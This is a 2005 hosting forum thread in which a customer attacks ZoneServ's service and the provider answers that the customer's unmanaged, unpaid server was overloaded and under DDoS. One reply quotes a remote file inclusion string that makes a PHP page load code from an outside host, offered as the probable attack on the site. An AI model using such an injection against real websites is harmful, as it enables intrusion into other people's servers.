Thread: Zonserv.com

Zonserv.com sucks

Hey everyone, i would just like to warn you not to get hosting from this site. I have had terrible service from that company, they messed me about to much. I had so much downtime and the service was very poor. I brought a server from them and it was very unreliable and no support when needed. I ordered this server thinking it would be great, but the speeds was slow and i fount out i was on "Cogent" bandwith, i was so furious and cancelled by subscription straight away. So it comes down to this, very poor and unreliable company please think twice before going with them.

Thanks for reading.

<<< Signatures need to be set up in your profile. >>>
    Last edited by SoftWareRevue; 07-14-2005 at 07:52 PM.

Did you contact zoneserv about your speeds and your routing? Do they mention thier notwork info on thier site?
    Did you run traces to see any other issues that may be out of zoneservs hands?
    Theres more to it then just saying thier speeds and support sucks.
    What kind of help did you need to need support? Was the server managed/unmanaged?

-Dave

It was a managed server, i tried contacting them sending email etc. They said they would fix it, 2 weeks later it's still down. I lost alot of fans and money due to the downtime, if i knew i was gonna have cogent i would of never purchased the server. So in the end i had a poor experience and i hope it won't happen to me or anyone else again.

Thanks for your reply.

Last edited by SoftWareRevue; 07-14-2005 at 07:52 PM.

Hey there,

Would you like to share what was the hostname of your server?
    So I would know who you are so I can reply appropriately .
    Best regards,
    Gil - ZoneServ.com.

Re: Zonserv.com sucks

Originally posted by acgogeta
    Hey everyone, i would just like to warn you not to get hosting from this site. I have had terrible service from that company, they messed me about to much. I had so much downtime and the service was very poor. I brought a server from them and it was very unreliable and no support when needed. I ordered this server thinking it would be great, but the speeds was slow and i fount out i was on "Cogent" bandwith, i was so furious and cancelled by subscription straight away. So it comes down to this, very poor and unreliable company please think twice before going with them.

Thanks for reading.

The site in your profile isn't hosted at ZoneServ but, that loads very, very slow. Maybe you've overloaded the server with too many illegal Anime episodes?

Cheers,
    MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

Re: Re: Zonserv.com sucks

Originally posted by elix
    The site in your profile isn't hosted at ZoneServ but, that loads very, very slow. Maybe you've overloaded the server with too many illegal Anime episodes?

Cheers,
    And from reading the shoutbox on the site last night makes me wonder if the site is getting dos'd or other hack attempts to slow it down?

Re: Re: Re: Zonserv.com sucks

Originally posted by DavidL
    And from reading the shoutbox on the site last night makes me wonder if the site is getting dos'd or other hack attempts to slow it down?
    Now MySQL failed on the box

Cheers,
    MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

Mystic-chambers you say? Well this is ZoneServ side of the story.

Mystic-chambers and I discussed the purchase (before the purchase itself) and he was told and informed that the bandwidth is cogent. We also discussed and I told him clearly that the server is not managed!. I helped him as much as I could. He would come to me more then 2 times a day asking me to fix something else, and I helped him like a fool, he was nice and I thought, why not help him. He came every day 2 times or even 3 times asking for files to be moved in the server, asking me to change names of his files, etc'.

Mystic-chambers asked for a 1GB RAM upgrade 1 time fee, I bought the RAM and after that we agreed that he will pay the bill during the next 6 months (16% each month) since he came and cried about not having enough money. He never paid for it, not even once.

His server was EXTREMELY-overloaded the HD was always 98% full and IOWAIT extremely high, getting DDos'd all the time, the DC he was hosted in complained that he used up almost a full 100mbit switch constantly on a 20mbit package.

About those 2 weeks of downtime, his HD died, and then DC installed a new one and guess what it died again as long with a stick of RAM. The guy was simply abusing the server!

Not to mention, he didn't pay for a full month, I sent him emails telling him to pay, the DC was all over me - not only the server is causing trouble it's also not being paid! I emailed and emailed and emailed and they unplugged his server (after 2 months of non-payment).

So you can say we suck, and our service is horrible and poor, even though you got helped 3 times a day, every day, always being nice and polite while you were screaming and swearing - But facts are facts dear Mystic-chambers, you did nothing but problems, you abused me, the DC, the HDs and the RAM.

Have a nice day,
    Best regards,
    Gil - ZoneServ.com.

I hear you loud and clear Gil. Just as I thought was happening in the first place. Some people dont know the meaning of unmanaged.
    Pulled from the shoutbox on his site just now....
    undead: u guys need to do something abouth hackers else theyr gonna keep attacking the site
    Some people want thier sites to grow but dont want to pay for enterprise level servers & management they need.
    ----edit----
    one more
    BrotherBlud: it loads slow cuz we are constantly being hacked!! if ur so smart, find a way to stop

I'm with Gil completely on this one.

I suggest you put a line in your ToS that says you don't host Anime sites of any kind :-). It totally eradicates all the kiddies that like to act like big shots hosting illegal Anime episodes and getting DoS'd all day.

By the way, to the OP, Cogent isn't slow. Cogent is actually very good now with all the improvements. I use it within a BGP mix of other providers, it works just fine.

Cheers,

ROFL,
    Check this thread and the site in his link
    http://www.webhostingtalk.com/showth...hreadid=424947

Heh.

It's no wonder they're being attacked.

mainv3.php?id=http://somebsdomain.com/inject.txt

Newbies...

"Got noob?"

Cheers,

Originally posted by elix
    It's no wonder they're being attacked.

I 'mostly' understood that...
    Eric J. Bowman, principal
    Bison Systems Corporation coming soon: a new sig!
    I'm just a poor, unfrozen caveman Webmaster. Your new 'standards' frighten, and confuse me...

Well when i used Zonserv it worked perfected, nice speed and whatnot, this was all before they were being attacked. I'm guessing their service sucks now.

Originally posted by Sting13
    Well when i used Zonserv it worked perfected, nice speed and whatnot, this was all before they were being attacked. I'm guessing their service sucks now.
    ZoneServ isn't being attacked!

This is a DEDICATED SERVER customer that is being attacked. Read the thread before you make false accusations for nothing.

Cheers,

Oh sorry, last time I went to their website it said that they were under attack. Sorry again.

theres always two sides of the story